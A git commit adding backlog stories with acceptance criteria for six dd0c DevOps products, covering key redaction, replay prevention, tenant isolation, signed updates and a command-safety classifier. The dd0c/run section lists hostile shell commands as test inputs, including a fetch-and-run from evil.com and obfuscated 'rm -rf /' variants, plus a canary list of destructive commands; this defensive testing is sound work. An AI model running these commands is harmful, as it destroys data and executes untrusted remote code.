Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 29 new stories
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions

# dd0c/route — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Proxy Engine
### Story 1.5: API Key Redaction in Error Traces
As a security-conscious developer, I want all API keys scrubbed from panic traces, error logs, and telemetry events, so that a proxy crash never leaks customer credentials.
**Acceptance Criteria:**
- Custom panic handler intercepts all panics and runs `redact_sensitive()` before logging.
- Regex patterns cover `sk-*`, `sk-ant-*`, `sk-proj-*`, `Bearer *` tokens.
- Telemetry events never contain raw API keys (verified by unit test scanning serialized JSON).
- Error responses to clients never echo back the Authorization header value.
**Estimate:** 2 points
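A minimal sketch of the redaction pass, assuming a regex-based scrub run inside the panic handler (the pattern list and the `redact_sensitive` name are illustrative, not the product's actual API):

```python
import re

# Illustrative patterns covering the key shapes named in the AC; the real
# list would be driven by the providers the proxy supports.
SENSITIVE_PATTERNS = [
    re.compile(r"sk-ant-[A-Za-z0-9_-]+"),   # Anthropic-style keys
    re.compile(r"sk-proj-[A-Za-z0-9_-]+"),  # OpenAI project keys
    re.compile(r"sk-[A-Za-z0-9_-]+"),       # generic sk-* keys
    re.compile(r"Bearer\s+\S+"),            # Authorization header values
]

def redact_sensitive(text: str) -> str:
    """Replace any credential-shaped substring before it reaches a log sink."""
    for pattern in SENSITIVE_PATTERNS:
        text = pattern.sub("[REDACTED]", text)
    return text
```

The same function would be called on serialized telemetry JSON before emission, which is what the unit-test scan in the AC verifies.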
### Story 1.6: SSE Disconnect Billing Accuracy
As an engineering manager, I want billing to reflect only the tokens actually streamed to the client, so that early disconnects don't charge for undelivered tokens.
**Acceptance Criteria:**
- When a client disconnects mid-stream, the proxy aborts the upstream connection within 1 second.
- Usage record reflects only tokens in chunks that were successfully flushed to the client.
- Disconnect during prompt processing (before first token) records 0 completion tokens.
- Provider connection count returns to 0 after client disconnect (no leaked connections).
**Estimate:** 3 points
---
## Epic 2 Addendum: Router Brain
### Story 2.5: Token Calculation Edge Cases
As a billing-accurate platform, I want token counting to handle Unicode, CJK, and emoji correctly per provider tokenizer, so that cost calculations match provider invoices within 1%.
**Acceptance Criteria:**
- Uses `cl100k_base` for OpenAI models, Claude tokenizer for Anthropic models.
- Token count for emoji sequences (🌍🔥) matches provider's count within 1%.
- CJK characters tokenized correctly (each char = 1+ tokens).
- Property test: 10K random strings, our count vs mock provider count within 1% tolerance.
**Estimate:** 2 points
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: Dedicated CI Runner for Latency Benchmarks
As a solo founder, I want proxy latency benchmarks to run on a dedicated self-hosted runner (NAS), so that P99 measurements are reproducible and not polluted by shared CI noise.
**Acceptance Criteria:**
- GitHub Actions workflow triggers on pushes to `src/proxy/**`.
- Runs `cargo bench --bench proxy_latency` on self-hosted runner.
- Fails the build if P99 exceeds 5ms.
- Results stored in `target/criterion/` for trend tracking.
**Estimate:** 1 point
---
**Total Addendum:** 8 points across 4 stories

# dd0c/drift — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 2 Addendum: Agent Communication
### Story 2.7: mTLS Revocation — Instant Lockout
As a security-conscious platform operator, I want revoked agent certificates to be instantly locked out (including active connections), so that a compromised agent cannot continue sending data.
**Acceptance Criteria:**
- CRL refresh triggers within 30 seconds of cert revocation.
- Existing mTLS connections from revoked certs are terminated (not just new connections rejected).
- New connection attempts with revoked certs return TLS handshake failure.
- Payload replay with captured nonce returns HTTP 409 Conflict.
**Estimate:** 3 points
---
## Epic 3 Addendum: Drift Analysis Engine
### Story 3.8: Terraform State Lock Recovery on Panic
As a customer, I want the panic button to safely release Terraform state locks, so that hitting "stop" doesn't brick my infrastructure.
**Acceptance Criteria:**
- Panic mode triggers `terraform force-unlock` if normal unlock fails.
- State lock is verified released within 10 seconds of panic signal.
- Agent logs the force-unlock attempt for audit trail.
- If both unlock methods fail, agent alerts the admin with the lock ID for manual recovery.
**Estimate:** 3 points
### Story 3.9: pgmq Visibility Timeout for Long Scans
As a self-hosted operator, I want long-running drift scans to extend their pgmq visibility timeout, so that a second worker doesn't pick up the same job mid-scan.
**Acceptance Criteria:**
- Worker extends visibility by 2 minutes every 90 seconds during processing.
- No duplicate processing occurs for scans taking up to 15 minutes.
- If worker crashes without extending, job becomes visible after timeout (correct behavior).
**Estimate:** 2 points
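A sketch of the heartbeat loop, with the clock and the visibility-extension call injected so it can be tested without a database (the `extend_visibility` callable would wrap pgmq's `set_vt`; all names here are illustrative):

```python
def run_scan(chunks, extend_visibility, clock, interval_s=90):
    """Process scan work in chunks, extending visibility every interval_s seconds.

    chunks: iterable of callables, one unit of scan work each.
    extend_visibility: injected wrapper around the pgmq visibility-extension call.
    clock: injected monotonic time source (seconds) so tests are deterministic.
    """
    last_extend = clock()
    for chunk in chunks:
        chunk()
        if clock() - last_extend >= interval_s:
            extend_visibility()  # push the timeout out another 2 minutes
            last_extend = clock()
```

Because the extension happens between chunks rather than on a timer thread, a crashed worker simply stops extending and the job becomes visible again, which is the recovery behavior the third criterion calls correct.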
---
## Epic 5 Addendum: Dashboard API
### Story 5.8: RLS Connection Pool Leak Prevention
As a multi-tenant SaaS, I want PgBouncer to clear tenant context between requests, so that Tenant A's drift data never leaks to Tenant B.
**Acceptance Criteria:**
- `SET LOCAL app.tenant_id` is cleared on connection return to pool.
- 100 concurrent tenant requests produce zero cross-tenant data leakage.
- Stress test with interleaved tenant requests on same PgBouncer connection passes.
**Estimate:** 2 points
---
## Epic 10 Addendum: Transparent Factory Compliance
### Story 10.6: Secret Scrubber Entropy Scanning
As a security-first platform, I want the secret scrubber to detect high-entropy strings (not just regex patterns), so that Base64-encoded keys and custom tokens are caught.
**Acceptance Criteria:**
- Shannon entropy > 3.5 bits/char on strings > 20 chars triggers redaction.
- Base64-encoded AWS keys detected and scrubbed.
- Multi-line RSA private keys detected and replaced with `[REDACTED RSA KEY]`.
- Normal log messages (low entropy) do not trigger false positives.
**Estimate:** 2 points
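The entropy check can be sketched directly from the criteria above (thresholds taken from the AC; `should_redact` and token-level scanning are illustrative assumptions):

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical symbol distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def should_redact(token: str, min_len: int = 20, threshold: float = 3.5) -> bool:
    """High-entropy strings above the length floor look like encoded secrets."""
    return len(token) > min_len and shannon_entropy(token) > threshold
```

The length floor is what keeps ordinary words out: short English tokens never reach 20 characters, and longer English phrases sit below 3.5 bits/char.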
---
**Total Addendum:** 12 points across 5 stories

# dd0c/alert — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Webhook Ingestion
### Story 1.6: HMAC Timestamp Freshness (Replay Prevention)
As a security-conscious operator, I want webhook payloads older than 5 minutes to be rejected, so that captured webhooks cannot be replayed to flood my ingestion pipeline.
**Acceptance Criteria:**
- Datadog: Rejects `dd-webhook-timestamp` older than 300 seconds.
- PagerDuty: Rejects payloads with missing timestamp header.
- OpsGenie: Extracts timestamp from payload body and validates freshness.
- Fresh webhooks (within 5-minute window) are accepted normally.
**Estimate:** 2 points
### Story 1.7: SQS 256KB Claim-Check Round-Trip
As a reliable ingestion pipeline, I want large alert payloads (>256KB) to round-trip through S3 claim-check without data loss, so that high-cardinality incidents are fully preserved.
**Acceptance Criteria:**
- Payloads > 256KB are compressed and stored in S3; SQS message contains S3 pointer.
- Correlation engine fetches from S3 and processes the full payload.
- S3 fetch timeout (10s) sends message to DLQ without crashing the engine.
- Engine health check returns 200 after S3 timeout recovery.
**Estimate:** 3 points
---
## Epic 2 Addendum: Correlation Engine
### Story 2.6: Out-of-Order Alert Delivery
As a reliable correlation engine, I want late-arriving alerts to attach to existing incidents (not create duplicates), so that distributed monitoring delays don't fragment the incident timeline.
**Acceptance Criteria:**
- Alert arriving after window close but within 2x window attaches to existing incident.
- Alert arriving after 3x window creates a new incident.
- Attached alerts update the incident timeline with correct original timestamp.
**Estimate:** 2 points
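The attach-or-create decision can be sketched as below. The AC leaves the band between 2x and 3x the window unspecified; this sketch attaches it (an assumption, chosen to keep timelines whole), and measures lateness from window close:

```python
def route_alert(alert_ts: float, window_end: float, window_s: float) -> str:
    """Return "attach" or "new_incident" for a possibly late alert.

    AC boundaries: lateness within 2x the correlation window attaches;
    beyond 3x opens a new incident. The 2x-3x band is treated as attach.
    """
    lateness = alert_ts - window_end
    if lateness <= 0:
        return "attach"            # arrived before window close: normal path
    if lateness <= 3 * window_s:
        return "attach"            # late but close enough to belong
    return "new_incident"
```

The attached alert would then be inserted into the timeline keyed by its original timestamp, per the third criterion.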
---
## Epic 5 Addendum: Slack Bot
### Story 5.6: Free Tier Enforcement (10K alerts/month)
As a PLG product, I want free tier tenants limited to 10K alerts/month with 7-day retention, so that the free tier is sustainable and upgrades are incentivized.
**Acceptance Criteria:**
- Alerts up to and including the 10,000th are accepted; the 10,001st returns 429 with a Stripe upgrade URL.
- Counter resets on first of each month.
- Data older than 7 days purged for free tier; 90-day retention for pro tier.
**Estimate:** 2 points
---
## Epic 6 Addendum: Dashboard API
### Story 6.7: Cross-Tenant Negative Isolation Tests
As a multi-tenant SaaS, I want explicit negative tests proving Tenant A cannot read Tenant B's data, so that confused deputy vulnerabilities are caught before launch.
**Acceptance Criteria:**
- Tenant A query returns zero Tenant B incidents (explicit assertion, not just "works for A").
- Cross-tenant incident access returns 404 (not 403 — don't leak existence).
- Tenant A analytics reflect only Tenant A's alert count.
**Estimate:** 1 point
---
**Total Addendum:** 10 points across 5 stories

# dd0c/portal — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: AWS Discovery Engine
### Story 1.7: Partial Scan Failure Recovery
As a catalog operator, I want partial discovery scan failures (timeout, rate limit) to preserve existing catalog entries, so that a flaky AWS API call doesn't delete half my service catalog.
**Acceptance Criteria:**
- Partial AWS scan (500 of 1000 resources) stages results without committing; all 1000 existing entries preserved.
- Partial GitHub scan (rate limited at 50 of 100) preserves all 100 ownership mappings.
- Scan failure triggers admin alert (not silent failure).
**Estimate:** 3 points
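A sketch of the stage-then-commit guard, assuming the scanner knows how many resources it expected to see (`commit_scan` and the expected-count heuristic are illustrative):

```python
def commit_scan(catalog: dict, staged: dict, expected_total: int) -> dict:
    """Swap in the staged results only if the scan saw everything it expected.

    A partial scan (timeouts, rate limits) is staged and then discarded,
    never merged destructively, so existing entries survive flaky API calls.
    """
    if len(staged) < expected_total:
        # Partial result: keep the old catalog intact and surface the failure
        # so the admin-alert path in the AC can fire.
        raise RuntimeError(
            f"partial scan ({len(staged)}/{expected_total}); catalog unchanged")
    return staged
```

The caller replaces its catalog reference only on a successful return, which is what makes the swap atomic from the reader's point of view.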
---
## Epic 2 Addendum: GitHub Discovery
### Story 2.6: Ownership Conflict Resolution
As a catalog operator, I want explicit ownership sources (CODEOWNERS/config) to override implicit sources (AWS tags) and heuristics (commit history), so that ownership is deterministic and predictable.
**Acceptance Criteria:**
- Priority: Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits).
- Concurrent discovery from two sources does not create duplicate catalog entries.
- Heuristic inference does not override an explicitly set owner.
**Estimate:** 2 points
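The priority rule can be sketched as a small deterministic resolver (the source labels and tie-break rule are illustrative):

```python
# Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)
PRIORITY = {"explicit": 3, "implicit": 2, "heuristic": 1}

def resolve_owner(claims):
    """claims: list of (source, owner) pairs in discovery order.

    The highest-priority source wins; ties keep the first claim seen,
    so concurrent discovery runs converge on the same answer.
    """
    best = None
    for source, owner in claims:
        if best is None or PRIORITY[source] > PRIORITY[best[0]]:
            best = (source, owner)
    return best[1] if best else None
```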
---
## Epic 4 Addendum: Search Engine
### Story 4.5: Meilisearch Zero-Downtime Index Rebuild
As a catalog user, I want Cmd+K search to work during index rebuilds, so that reindexing doesn't cause downtime.
**Acceptance Criteria:**
- Search returns results during active index rebuild (swap-based rebuild).
- Rebuild failure does not corrupt the active index.
- Cmd+K prefix search from Redis cache returns in <10ms.
**Estimate:** 2 points
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: VCR Cassette Freshness CI
As a maintainer, I want VCR cassettes re-recorded weekly against real AWS, so that API response drift is caught before it breaks integration tests.
**Acceptance Criteria:**
- Weekly CI job (Monday 6 AM UTC) re-records cassettes with real AWS credentials.
- Creates PR if any cassettes changed (API drift detected).
- Diff summary shows which cassettes changed and by how much.
**Estimate:** 1 point
---
## Epic 9 Addendum: Onboarding & PLG
### Story 9.6: Free Tier Enforcement (50 Services)
As a PLG product, I want free tier tenants limited to 50 services, so that the free tier is sustainable.
**Acceptance Criteria:**
- 50th service creation succeeds; 51st returns 403 with upgrade prompt.
**Estimate:** 1 point
---
**Total Addendum:** 9 points across 5 stories

# dd0c/cost — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 2 Addendum: Anomaly Detection Engine
### Story 2.8: Concurrent Baseline Update Conflict Resolution
As a reliable anomaly detector, I want concurrent Lambda invocations updating the same baseline to converge correctly via DynamoDB conditional writes, so that Welford running stats are never corrupted.
**Acceptance Criteria:**
- Two simultaneous updates to the same baseline both succeed (one retries via ConditionalCheckFailed).
- Final baseline count reflects both observations.
- Retry reads fresh baseline before re-applying the update.
**Estimate:** 2 points
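A sketch of the optimistic-concurrency loop against an in-memory stand-in for the DynamoDB item; the attribute names and the version-based condition are illustrative (DynamoDB itself would use a conditional `PutItem` raising `ConditionalCheckFailedException`):

```python
class ConditionalCheckFailed(Exception):
    """Stand-in for DynamoDB's ConditionalCheckFailedException."""

class FakeTable:
    """In-memory baseline item with a version-guarded conditional write."""
    def __init__(self):
        self.item = {"count": 0, "mean": 0.0, "version": 0}
    def get(self):
        return dict(self.item)
    def put_if_version(self, item, expected_version):
        if self.item["version"] != expected_version:
            raise ConditionalCheckFailed
        item["version"] = expected_version + 1
        self.item = item

def record_observation(table, value, max_retries=5):
    """Welford-style running-mean update with optimistic concurrency:
    on conflict, re-read the fresh baseline and re-apply."""
    for _ in range(max_retries):
        base = table.get()
        n = base["count"] + 1
        mean = base["mean"] + (value - base["mean"]) / n
        try:
            table.put_if_version({"count": n, "mean": mean}, base["version"])
            return
        except ConditionalCheckFailed:
            continue  # lost the race: retry against the fresh baseline
    raise RuntimeError("baseline update failed after retries")
```

The retry re-reads before re-applying, so the losing writer's observation lands on top of the winner's state rather than overwriting it.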
### Story 2.9: Property-Based Anomaly Scorer Validation (10K runs)
As a mathematically sound anomaly detector, I want the scorer validated with 10K property-based test runs, so that edge cases in the scoring function are caught before launch.
**Acceptance Criteria:**
- Score is always between 0 and 100 for any valid input (10K runs, seed=42).
- Score monotonically increases as cost increases (10K runs).
- Reproducible via fixed seed.
**Estimate:** 1 point
---
## Epic 3 Addendum: Notification Service
### Story 3.7: Remediation RBAC (Slack Action Authorization)
As a security-conscious operator, I want only account owners to trigger destructive remediation actions (Stop Instance), so that a random Slack viewer can't shut down production.
**Acceptance Criteria:**
- Owner role can trigger "Stop Instance" (200).
- Viewer role gets 403 with "insufficient permissions".
- User from different Slack workspace gets 403.
- Non-destructive actions (snooze, mark-expected) allowed for all authenticated users.
**Estimate:** 2 points
---
## Epic 4 Addendum: Customer Onboarding
### Story 4.7: Clock Interface for Governance Tests
As a testable governance engine, I want time-dependent logic (14-day auto-promotion) to use an injectable Clock interface, so that governance tests are deterministic and don't depend on wall-clock time.
**Acceptance Criteria:**
- `FakeClock` can be injected into `GovernanceEngine`.
- Day 13: no promotion. Day 15 + low FP rate: promotion. Day 15 + high FP rate: no promotion.
- No `Date.now()` calls in governance logic — all via Clock interface.
**Estimate:** 1 point
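A minimal sketch of the injectable clock, with `GovernanceEngine` reduced to just the promotion predicate (field names and the false-positive threshold are illustrative):

```python
import time
from dataclasses import dataclass

class SystemClock:
    def now(self) -> float:
        return time.time()

@dataclass
class FakeClock:
    t: float = 0.0
    def now(self) -> float:
        return self.t
    def advance_days(self, days: float) -> None:
        self.t += days * 86400

@dataclass
class GovernanceEngine:
    """Slice of the 14-day auto-promotion rule: no direct time calls,
    only the injected clock."""
    clock: object
    created_at: float
    fp_rate_threshold: float = 0.05

    def should_promote(self, fp_rate: float) -> bool:
        age_days = (self.clock.now() - self.created_at) / 86400
        return age_days >= 14 and fp_rate < self.fp_rate_threshold
```

Production wires in `SystemClock`; tests wire in `FakeClock` and simply advance it, which is what makes the day-13/day-15 criteria deterministic.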
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: Redis Failure Safe Default for Panic Mode
As a resilient platform, I want panic mode checks to default to "active" (safe) when Redis is unreachable, so that a Redis outage doesn't accidentally disable safety controls.
**Acceptance Criteria:**
- Redis disconnect → `checkPanicMode()` returns `true` (panic active).
- Warning logged: "Redis unreachable — defaulting to panic=active".
- Normal operation resumes when Redis reconnects.
**Estimate:** 1 point
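The fail-safe default can be sketched in a few lines, with the Redis call injected so the outage path is testable without a real Redis (`check_panic_mode` mirrors the AC's `checkPanicMode`; the key name is illustrative):

```python
def check_panic_mode(redis_get) -> bool:
    """Fail safe: if Redis cannot answer, assume panic is active.

    redis_get is an injected callable (e.g. a wrapper around GET panic_mode)
    that raises ConnectionError when Redis is unreachable.
    """
    try:
        value = redis_get("panic_mode")
    except ConnectionError:
        print("WARN: Redis unreachable — defaulting to panic=active")
        return True
    return value == b"1"
```

Normal operation needs no special recovery path: once `redis_get` stops raising, the next check reads the real flag again.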
---
**Total Addendum:** 7 points across 5 stories

# dd0c/run — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Runbook Parser
### Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
**Acceptance Criteria:**
- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
- `eval $(echo 'rm -rf /')` classified as Dangerous.
- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
- Heredoc with embedded danger classified as Dangerous.
- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
- `kubectl get pods -n production` classified as Safe.
**Estimate:** 5 points
---
## Epic 2 Addendum: Action Classifier
### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
**Acceptance Criteria:**
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
**Estimate:** 2 points
---
## Epic 3 Addendum: Execution Engine
### Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
**Acceptance Criteria:**
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
**Estimate:** 2 points
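The state transition can be sketched as a pure function over the waiting timer (the function shape is illustrative; the real engine would persist state and fire the alert hook on the FailedClosed edge):

```python
def resolve_intervention(waiting_since: float, now: float,
                         human_resolved: bool, ttl_s: int = 300) -> str:
    """Next state for a pending manual intervention.

    "Complete" if a human resolved before the TTL, "FailedClosed" once the
    TTL (default 5 minutes) expires, otherwise still "Waiting".
    """
    if human_resolved:
        return "Complete"
    if now - waiting_since >= ttl_s:
        return "FailedClosed"   # out-of-band critical alert fires here
    return "Waiting"
```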
---
## Epic 5 Addendum: Audit Trail
### Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
**Acceptance Criteria:**
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
- WAL (write-ahead log): events survive agent crash and are recoverable.
**Estimate:** 3 points
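The hash-chain portion can be sketched with SHA-256 over `prev_hash + canonical event JSON` (an assumption; the product's exact canonicalization and hash choice are not specified here):

```python
import hashlib
import json

GENESIS = "0" * 64  # sentinel hash for the first link

def append_event(chain: list, event: dict) -> None:
    """Append an audit event linked to the previous entry's hash."""
    prev = chain[-1]["hash"] if chain else GENESIS
    payload = json.dumps(event, sort_keys=True)  # canonical form
    digest = hashlib.sha256((prev + payload).encode()).hexdigest()
    chain.append({"event": event, "prev": prev, "hash": digest})

def verify_chain(chain: list) -> bool:
    """Recompute every link; tampering with any event breaks the chain."""
    prev = GENESIS
    for entry in chain:
        payload = json.dumps(entry["event"], sort_keys=True)
        expected = hashlib.sha256((prev + payload).encode()).hexdigest()
        if entry["prev"] != prev or entry["hash"] != expected:
            return False
        prev = entry["hash"]
    return True
```

Streaming each entry to the WAL as it is appended (rather than batching) is what lets `verify_chain()` still succeed over whatever prefix survived a crash.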
### Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
**Acceptance Criteria:**
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- Failed signature verification falls back to existing policy (no degradation).
**Estimate:** 3 points
---
**Total Addendum:** 15 points across 5 stories